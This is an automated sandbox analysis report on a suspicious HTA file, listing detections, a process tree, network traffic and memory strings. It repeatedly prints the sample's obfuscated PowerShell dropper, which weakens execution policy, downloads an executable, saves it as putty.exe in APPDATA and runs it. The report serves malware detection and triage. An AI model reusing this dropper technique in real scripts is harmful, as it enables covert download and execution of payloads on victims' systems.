Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
qwertyuiopasdfghjklzxcvbnm.hta

Overview

General Information

Sample name:qwertyuiopasdfghjklzxcvbnm.hta
Analysis ID:1583693
MD5:3ed42aa65e65e6f7ae0dd6c83200e076
SHA1:bd6d720a134ad38173bf5eaf07f3357d2653ec0c
SHA256:c51efd8c212706aa13de88fac4d6a28e29a44efeb93d39b188d61c51ca2259d5
Tags:htauser-abuse_ch
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Powershell drops PE file
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 7400 cmdline: mshta.exe "C:\Users\user\Desktop\qwertyuiopasdfghjklzxcvbnm.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 7496 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTF($zbaIc, $FeyQCF){[IO.File]::WriteAllBytes($zbaIc, $FeyQCF)};function o($zbaIc){if($zbaIc.EndsWith((X @(254,308,316,316))) -eq $True){Start-Process (X @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaIc}else{Start-Process $zbaIc}};function Dwm($QOqguGOgy){$XGUiZZx = New-Object (X @(286,309,324,254,295,309,306,275,316,313,309,318,324));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$FeyQCF = $XGUiZZx.DownloadData($QOqguGOgy);return $FeyQCF};function X($PkXNL){$bzLbp=208;$hWqeYBbV=$Null;foreach($TPTApHL in $PkXNL){$hWqeYBbV+=[char]($TPTApHL-$bzLbp)};return $hWqeYBbV};function ubZ(){$h = $env:APPDATA + '\';$qZD = Dwm (X @(312,324,324,320,323,266,255,255,324,312,309,254,309,305,322,324,312,254,316,313,255,334,323,311,324,305,324,312,305,317,255,320,325,324,324,329,255,316,305,324,309,323,324,255,327,262,260,255,320,325,324,324,329,254,309,328,309));$G = $h + 'putty.exe';QTF $G $qZD;o $G;;;;}ubZ; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • putty.exe (PID: 7664 cmdline: "C:\Users\user\AppData\Roaming\putty.exe" MD5: 765BDC0F8BC0D77F7414E7A36AE45FD9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7496INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x843:$b1: ::WriteAllBytes(
  • 0x9435e:$b1: ::WriteAllBytes(
  • 0x949d4:$b1: ::WriteAllBytes(
  • 0x94fb4:$b1: ::WriteAllBytes(
  • 0x9542f:$b1: ::WriteAllBytes(
  • 0xbb99b:$b1: ::WriteAllBytes(
  • 0xfc995:$b1: ::WriteAllBytes(
  • 0xfcd7b:$b1: ::WriteAllBytes(
  • 0x10651f:$b1: ::WriteAllBytes(
  • 0x1070cc:$b1: ::WriteAllBytes(
  • 0x108dbf:$b1: ::WriteAllBytes(
  • 0x1091a5:$b1: ::WriteAllBytes(
  • 0x10a3a4:$b1: ::WriteAllBytes(
  • 0x10f782:$b1: ::WriteAllBytes(
  • 0x15a618:$b1: ::WriteAllBytes(
  • 0x15a79c:$b1: ::WriteAllBytes(
  • 0x1ca2c1:$b1: ::WriteAllBytes(
  • 0x1cec5d:$b1: ::WriteAllBytes(
  • 0x1d5f5a:$b1: ::WriteAllBytes(
  • 0x1d81db:$b1: ::WriteAllBytes(
  • 0x1e02f5:$b1: ::WriteAllBytes(

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious MSHTA Child Process
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTF($zbaIc, $FeyQCF){[IO.File]::WriteAllBytes($zbaIc, $FeyQCF)};function o($zbaIc){if($zbaIc.EndsWith((X @(254,308,316,316))) -eq $True){Start-Process (X @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaIc}else{Start-Process $zbaIc}};function Dwm($QOqguGOgy){$XGUiZZx = New-Object (X @(286,309,324,254,295,309,306,275,316,313,309,318,324));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$FeyQCF = $XGUiZZx.DownloadData($QOqguGOgy);return $FeyQCF};function X($PkXNL){$bzLbp=208;$hWqeYBbV=$Null;foreach($TPTApHL in $PkXNL){$hWqeYBbV+=[char]($TPTApHL-$bzLbp)};return $hWqeYBbV};function ubZ(){$h = $env:APPDATA + '\';$qZD = Dwm (X @(312,324,324,320,323,266,255,255,324,312,309,254,309,305,322,324,312,254,316,313,255,334,323,311,324,305,324,312,305,317,255,320,325,324,324,329,255,316,305,324,309,323,324,255,327,262,260,255,320,325,324,324,329,254,309,328,309));$G = $h + 'putty.exe';QTF $G $qZD;o $G;;;;}ubZ;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTF($zbaIc, $FeyQCF){[IO.File]::WriteAllBytes($zbaIc, $FeyQCF)};function o($zbaIc){if($zbaIc.EndsWith((X @(254,308,316,316))) -eq $True){Start-Process (X @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaIc}else{Start-Process $zbaIc}};function Dwm($QOqguGOgy){$XGUiZZx = New-Object (X @(286,309,324,254,295,309,306,275,316,313,309,318,324));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$FeyQCF = $XGUiZZx.DownloadData($QOqguGOgy);return $FeyQCF};function X($PkXNL){$bzLbp=208;$hWqeYBbV=$Null;foreach($TPTApHL in $PkXNL){$hWqeYBbV+=[char]($TPTApHL-$bzLbp)};return $hWqeYBbV};function ubZ(){$h = $env:APPDATA + '\';$qZD = Dwm (X @(312,324,324,320,323,266,255,255,324,312,309,254,309,305,322,324,312,254,316,313,255,334,323,311,324,305,324,312,305,317,255,320,325,324,324,329,255,316,305,324,309,323,324,255,327,262,260,255,320,325,324,324,329,254,309,328,309));$G = $h + 'putty.exe';QTF $G $qZD;o $G;;;;}ubZ;, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\qwertyuiopasdfghjklzxcvbnm.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7400, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTF($zbaIc, $FeyQCF){[IO.File]::WriteAllBytes($zbaIc, $FeyQCF)};function o($zbaIc){if($zbaIc.EndsWith((X @(254,308,316,316))) -eq $True){Start-Process (X @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaIc}else{Start-Process $zbaIc}};function Dwm($QOqguGOgy){$XGUiZZx = New-Object (X @(286,309,324,254
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTF($zbaIc, $FeyQCF){[IO.File]::WriteAllBytes($zbaIc, $FeyQCF)};function o($zbaIc){if($zbaIc.EndsWith((X @(254,308,316,316))) -eq $True){Start-Process (X @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaIc}else{Start-Process $zbaIc}};function Dwm($QOqguGOgy){$XGUiZZx = New-Object (X @(286,309,324,254,295,309,306,275,316,313,309,318,324));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$FeyQCF = $XGUiZZx.DownloadData($QOqguGOgy);return $FeyQCF};function X($PkXNL){$bzLbp=208;$hWqeYBbV=$Null;foreach($TPTApHL in $PkXNL){$hWqeYBbV+=[char]($TPTApHL-$bzLbp)};return $hWqeYBbV};function ubZ(){$h = $env:APPDATA + '\';$qZD = Dwm (X @(312,324,324,320,323,266,255,255,324,312,309,254,309,305,322,324,312,254,316,313,255,334,323,311,324,305,324,312,305,317,255,320,325,324,324,329,255,316,305,324,309,323,324,255,327,262,260,255,320,325,324,324,329,254,309,328,309));$G = $h + 'putty.exe';QTF $G $qZD;o $G;;;;}ubZ;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTF($zbaIc, $FeyQCF){[IO.File]::WriteAllBytes($zbaIc, $FeyQCF)};function o($zbaIc){if($zbaIc.EndsWith((X @(254,308,316,316))) -eq $True){Start-Process (X @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaIc}else{Start-Process $zbaIc}};function Dwm($QOqguGOgy){$XGUiZZx = New-Object (X @(286,309,324,254,295,309,306,275,316,313,309,318,324));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$FeyQCF = $XGUiZZx.DownloadData($QOqguGOgy);return $FeyQCF};function X($PkXNL){$bzLbp=208;$hWqeYBbV=$Null;foreach($TPTApHL in $PkXNL){$hWqeYBbV+=[char]($TPTApHL-$bzLbp)};return $hWqeYBbV};function ubZ(){$h = $env:APPDATA + '\';$qZD = Dwm (X @(312,324,324,320,323,266,255,255,324,312,309,254,309,305,322,324,312,254,316,313,255,334,323,311,324,305,324,312,305,317,255,320,325,324,324,329,255,316,305,324,309,323,324,255,327,262,260,255,320,325,324,324,329,254,309,328,309));$G = $h + 'putty.exe';QTF $G $qZD;o $G;;;;}ubZ;, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\qwertyuiopasdfghjklzxcvbnm.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7400, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTF($zbaIc, $FeyQCF){[IO.File]::WriteAllBytes($zbaIc, $FeyQCF)};function o($zbaIc){if($zbaIc.EndsWith((X @(254,308,316,316))) -eq $True){Start-Process (X @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaIc}else{Start-Process $zbaIc}};function Dwm($QOqguGOgy){$XGUiZZx = New-Object (X @(286,309,324,254
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7496, TargetFilename: C:\Users\user\AppData\Roaming\putty.exe
Sigma detected: Potential Dosfuscation Activity
Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTF($zbaIc, $FeyQCF){[IO.File]::WriteAllBytes($zbaIc, $FeyQCF)};function o($zbaIc){if($zbaIc.EndsWith((X @(254,308,316,316))) -eq $True){Start-Process (X @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaIc}else{Start-Process $zbaIc}};function Dwm($QOqguGOgy){$XGUiZZx = New-Object (X @(286,309,324,254,295,309,306,275,316,313,309,318,324));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$FeyQCF = $XGUiZZx.DownloadData($QOqguGOgy);return $FeyQCF};function X($PkXNL){$bzLbp=208;$hWqeYBbV=$Null;foreach($TPTApHL in $PkXNL){$hWqeYBbV+=[char]($TPTApHL-$bzLbp)};return $hWqeYBbV};function ubZ(){$h = $env:APPDATA + '\';$qZD = Dwm (X @(312,324,324,320,323,266,255,255,324,312,309,254,309,305,322,324,312,254,316,313,255,334,323,311,324,305,324,312,305,317,255,320,325,324,324,329,255,316,305,324,309,323,324,255,327,262,260,255,320,325,324,324,329,254,309,328,309));$G = $h + 'putty.exe';QTF $G $qZD;o $G;;;;}ubZ;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTF($zbaIc, $FeyQCF){[IO.File]::WriteAllBytes($zbaIc, $FeyQCF)};function o($zbaIc){if($zbaIc.EndsWith((X @(254,308,316,316))) -eq $True){Start-Process (X @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaIc}else{Start-Process $zbaIc}};function Dwm($QOqguGOgy){$XGUiZZx = New-Object (X @(286,309,324,254,295,309,306,275,316,313,309,318,324));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$FeyQCF = $XGUiZZx.DownloadData($QOqguGOgy);return $FeyQCF};function X($PkXNL){$bzLbp=208;$hWqeYBbV=$Null;foreach($TPTApHL in $PkXNL){$hWqeYBbV+=[char]($TPTApHL-$bzLbp)};return $hWqeYBbV};function ubZ(){$h = $env:APPDATA + '\';$qZD = Dwm (X @(312,324,324,320,323,266,255,255,324,312,309,254,309,305,322,324,312,254,316,313,255,334,323,311,324,305,324,312,305,317,255,320,325,324,324,329,255,316,305,324,309,323,324,255,327,262,260,255,320,325,324,324,329,254,309,328,309));$G = $h + 'putty.exe';QTF $G $qZD;o $G;;;;}ubZ;, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\qwertyuiopasdfghjklzxcvbnm.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7400, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTF($zbaIc, $FeyQCF){[IO.File]::WriteAllBytes($zbaIc, $FeyQCF)};function o($zbaIc){if($zbaIc.EndsWith((X @(254,308,316,316))) -eq $True){Start-Process (X @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaIc}else{Start-Process $zbaIc}};function Dwm($QOqguGOgy){$XGUiZZx = New-Object (X @(286,309,324,254
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTF($zbaIc, $FeyQCF){[IO.File]::WriteAllBytes($zbaIc, $FeyQCF)};function o($zbaIc){if($zbaIc.EndsWith((X @(254,308,316,316))) -eq $True){Start-Process (X @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaIc}else{Start-Process $zbaIc}};function Dwm($QOqguGOgy){$XGUiZZx = New-Object (X @(286,309,324,254,295,309,306,275,316,313,309,318,324));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$FeyQCF = $XGUiZZx.DownloadData($QOqguGOgy);return $FeyQCF};function X($PkXNL){$bzLbp=208;$hWqeYBbV=$Null;foreach($TPTApHL in $PkXNL){$hWqeYBbV+=[char]($TPTApHL-$bzLbp)};return $hWqeYBbV};function ubZ(){$h = $env:APPDATA + '\';$qZD = Dwm (X @(312,324,324,320,323,266,255,255,324,312,309,254,309,305,322,324,312,254,316,313,255,334,323,311,324,305,324,312,305,317,255,320,325,324,324,329,255,316,305,324,309,323,324,255,327,262,260,255,320,325,324,324,329,254,309,328,309));$G = $h + 'putty.exe';QTF $G $qZD;o $G;;;;}ubZ;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTF($zbaIc, $FeyQCF){[IO.File]::WriteAllBytes($zbaIc, $FeyQCF)};function o($zbaIc){if($zbaIc.EndsWith((X @(254,308,316,316))) -eq $True){Start-Process (X @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaIc}else{Start-Process $zbaIc}};function Dwm($QOqguGOgy){$XGUiZZx = New-Object (X @(286,309,324,254,295,309,306,275,316,313,309,318,324));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$FeyQCF = $XGUiZZx.DownloadData($QOqguGOgy);return $FeyQCF};function X($PkXNL){$bzLbp=208;$hWqeYBbV=$Null;foreach($TPTApHL in $PkXNL){$hWqeYBbV+=[char]($TPTApHL-$bzLbp)};return $hWqeYBbV};function ubZ(){$h = $env:APPDATA + '\';$qZD = Dwm (X @(312,324,324,320,323,266,255,255,324,312,309,254,309,305,322,324,312,254,316,313,255,334,323,311,324,305,324,312,305,317,255,320,325,324,324,329,255,316,305,324,309,323,324,255,327,262,260,255,320,325,324,324,329,254,309,328,309));$G = $h + 'putty.exe';QTF $G $qZD;o $G;;;;}ubZ;, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\qwertyuiopasdfghjklzxcvbnm.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7400, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTF($zbaIc, $FeyQCF){[IO.File]::WriteAllBytes($zbaIc, $FeyQCF)};function o($zbaIc){if($zbaIc.EndsWith((X @(254,308,316,316))) -eq $True){Start-Process (X @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaIc}else{Start-Process $zbaIc}};function Dwm($QOqguGOgy){$XGUiZZx = New-Object (X @(286,309,324,254

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-03T12:17:57.355363+010028033053Unknown Traffic192.168.2.44973193.93.131.124443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: qwertyuiopasdfghjklzxcvbnm.htaVirustotal: Detection: 11%Perma Link
Source: unknownHTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A5FB90 GetWindowsDirectoryA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,GetCurrentProcessId,3_2_00007FF738A5FB90
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A844D0 GetProcAddress,FindFirstFileW,CloseHandle,3_2_00007FF738A844D0
Source: global trafficHTTP traffic detected: GET /~sgtatham/putty/latest/w64/putty.exe HTTP/1.1Host: the.earth.liConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /~sgtatham/putty/0.82/w64/putty.exe HTTP/1.1Host: the.earth.li
Source: Joe Sandbox ViewIP Address: 93.93.131.124 93.93.131.124
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49731 -> 93.93.131.124:443
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A6CBA0 recv,3_2_00007FF738A6CBA0
Source: global trafficHTTP traffic detected: GET /~sgtatham/putty/latest/w64/putty.exe HTTP/1.1Host: the.earth.liConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /~sgtatham/putty/0.82/w64/putty.exe HTTP/1.1Host: the.earth.li
Source: global trafficDNS traffic detected: DNS query: the.earth.li
Source: powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1707635780.00000000050EC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1707635780.00000000050EC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1707635780.00000000050EC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1707635780.00000000050EC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: powershell.exe, 00000001.00000002.1707635780.0000000005EEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1707635780.00000000050EC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drString found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000001.00000002.1707635780.0000000004FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1707635780.0000000004E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1707635780.0000000004FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1715064854.00000000079F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000001.00000002.1707635780.0000000004E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.1707635780.0000000005EEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1707635780.0000000005EEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1707635780.0000000005EEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1707635780.0000000004FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1707635780.0000000005EEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1707635780.00000000050EC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drString found in binary or memory: https://sectigo.com/CPS0
Source: powershell.exe, 00000001.00000002.1707635780.0000000004FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://the.earth.li
Source: powershell.exe, 00000001.00000002.1707635780.00000000050F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1707635780.00000000050F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://the.earth.li/~sgtatham/putty/0.82/w64/putty.exe
Source: powershell.exe, 00000001.00000002.1707635780.0000000004FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe
Source: powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, putty.exe, putty.exe, 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp, putty.exe, 00000003.00000000.1705777780.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp, putty.exe.1.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
Source: powershell.exe, 00000001.00000002.1707635780.0000000006031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1707635780.00000000050EC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.1.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownHTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A3BDC0 OpenClipboard,GetClipboardData,GetClipboardData,SendMessageA,CloseClipboard,3_2_00007FF738A3BDC0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A372F0 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,GlobalFree,3_2_00007FF738A372F0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A38900 WideCharToMultiByte,GlobalAlloc,GlobalAlloc,GlobalAlloc,GlobalLock,GlobalLock,WideCharToMultiByte,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree,GlobalFree,WideCharToMultiByte,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalUnlock,GlobalUnlock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,RegisterClipboardFormatA,SetClipboardData,CloseClipboard,GlobalFree,GlobalFree,GlobalFree,SendMessageA,3_2_00007FF738A38900
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A3BDC0 OpenClipboard,GetClipboardData,GetClipboardData,SendMessageA,CloseClipboard,3_2_00007FF738A3BDC0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A3CB10 GetKeyboardState,3_2_00007FF738A3CB10

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 7496, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\putty.exeJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04DF0D621_2_04DF0D62
